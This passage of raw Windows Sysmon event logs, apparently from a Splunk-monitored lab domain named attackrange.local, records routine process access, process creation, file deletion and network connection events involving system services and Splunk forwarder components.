09:22:30.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.014{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D55-6151-A400-00000000FD01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.014{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D55-6151-A400-00000000FD01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:29.859{5EBD8912-8D55-6151-A400-00000000FD01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.921{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3718BE6B6A917A496E1BAF555C51E3,SHA256=71B10AA90924E93E263CA397AAB60DE0EFBE3D65929D59DC75D93B7A404322D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981052Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:31.966{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D18F7295A812FA7AE21DC0DA0463EE9E,SHA256=12CE0D3CAB1C64394FD6681B50487FA390B8DF44B638CEE94990B13F310F225D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981051Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:31.435{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A900F18E6B2D422251F9FD258C267C66,SHA256=EBC6F79CB216B93898BC9F4ACCF34113197ED22DC76EDBAE5FB2750CB3D8CF93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.749{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D57-6151-A600-00000000FD01}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.749{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.749{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.749{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.749{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.749{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D57-6151-A600-00000000FD01}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.749{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D57-6151-A600-00000000FD01}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.627{5EBD8912-8D57-6151-A600-00000000FD01}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.734{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DAC7FB4F06C49EB65BAC0E3B0704E33,SHA256=C307CBEA22882F3F5CBA93EBE44FEED02516E3D2AECBCB501AA01D420D8477A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.108{5EBD8912-8D56-6151-A500-00000000FD01}51004344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001056263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:29.585{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54221-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001056262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:29.585{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54221-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x8000000000000000981050Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.062{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56900-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981049Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.763{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64574-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981056Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:32.638{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7382E7B7E0F83FE026B697A8CE58D241,SHA256=2050A5DB9A2956CD0F7AE2F2E77786F21A40B933361067E567796F915CE9F528,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981055Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:32.622{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=8DFD000B29F4682DF0A296E1DCAAAA2A,SHA256=3EC9554110194A945F1A968543719C0342B0DC80B463C886B8046C195EC4926F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981054Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.273{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57543-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981053Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.728{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59525-false10.0.1.12-8000- 23542300x8000000000000000981057Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:33.872{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC313E44D4841076E5DEF5B9B08893A2,SHA256=8FE73D8EE926CBCA4EF2D6833B49BC00BF6F417B3C0F33124A929CC37BA55F7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.750{5EBD8912-8D59-6151-A700-00000000FD01}33005088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.468{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D59-6151-A700-00000000FD01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.453{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.453{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.453{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.453{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.453{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D59-6151-A700-00000000FD01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.453{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D59-6151-A700-00000000FD01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:33.313{5EBD8912-8D59-6151-A700-00000000FD01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001056276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:31.054{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54222-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 